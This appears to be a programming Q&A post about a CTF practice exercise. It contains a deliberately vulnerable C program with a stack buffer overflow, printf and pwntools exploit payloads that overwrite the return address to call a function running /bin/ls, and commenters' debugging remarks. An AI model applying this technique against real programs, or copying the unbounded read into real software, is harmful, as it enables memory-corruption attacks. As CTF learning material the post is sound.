# Innocent input breaks buffer overflow exploit?

Tags: c, security, gdb, buffer-overflow

Below is a simple program, vulnerable to buffer overflow; it is as similar as I could make it to a bigger (CTF) program I was working on and I "extracted" (re-wrote) only that piece where the bug lies.

When the commented `for` loop is not in the binary, the exploit works; when the loop is in the binary, although it does nothing at all, the exploit does not work.

This is how I run the program without and with the `for` loop respectively:

```
printf 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x7b\x06\x40\x00\x00\x00\x00\x00\n' | ./a.out

printf 'a\na\na\na\na\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x7b\x06\x40\x00\x00\x00\x00\x00\n' | ./a.out
```

("A"*88) where 0x0040067b is `unreachable()` (after the prologue).

`unreachable` is at the very beginning, so the address remains the same both when the `for` loop is or is not commented out.

Then I wrote this script:

```
#!/usr/bin/env python
from pwn import *
s = process('./own_wumpus')
for i in range(5):
    s.sendline('a')
payload = 'A'*88+'\x7b\x06\x40\x00\x00\x00\x00\x00'
s.sendline(payload)
s.interactive()
```

to do exactly what I think `printf`, `cat` and everything else I tried would do, but this instead works perfectly (`ls` executed).

This is the program.

```cpp
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>

char global[0x46];
void unreachable() {
    system("/bin/ls");
    exit(0);
}

char get_char() {
    char c;
    printf("%s\n> ", "Action");
    do {
        scanf("%c", &c);
    } while (c == '\n');
    return toupper(c);
}

int f(int fd, int max_bytes, char *buf) {
    int bytes_read = 0;
    int from_fd = fd;
    int total_read = 0;
    int max_bytes_to_read = max_bytes;
    char *p = buf;
    for (total_read = 0; total_read < max_bytes_to_read; total_read += bytes_read) {
        bytes_read = read(from_fd, p, 1);
        if (bytes_read <= 0) exit(0);
        if (*p == '\n') break;
        p += bytes_read;
    }
    return total_read;
}

int _main() {
    char buf[0x46];
    //for (int i = 0; i != 5; ++i) {
    //    *buf = get_char();
    //}
    memset(buf, 0, sizeof(buf));
    f(0, 0xc8, buf); // intended
    strncpy(global, buf, 0x45);
    return 0;
}

int main() {
    int false = 0;
    printf(">");
    if (false) unreachable();
    return _main();
}
```

Compile with:

```
gcc source.c -fno-stack-protector -no-pie -fno-plt -fno-pic -Wl,-z,norelro && strip a.out
```

Expected output: `ls` executed every time.

Actual output: `ls` executed only with `pwntools` (python script above); everything else fails. When the `for` loop is commented out, `ls` is executed also with the `printf A*88+address` above.

My first thought was on pipes, but it would not explain the differences with the buffers with and without `a`'s. (Even weirder, in the actual program it worked with gdb and the python script, but not with `cat`/`printf`.)

Comment: I'd print the function address just in case...

Comment: The *target function*. Within the program... did it properly build a non-pie executable :D

Comment: @AnttiHaapala I assume you mean `unreachable`. The address is correct; also it wouldn't make much sense if not, as with pwntools I use the same address and it works properly.

Comment: @ryyker they are equivalent

Comment: I am still looking for an answer. (The only answer that had been posted turned out to be wrong.)

Comment: "When the commented for loop is not in the binary, the exploit works" which for loop

Comment: @AnttiHaapala     //for (int i = 0; i != 5; ++i) {
    //    *buf = get_char();
    //}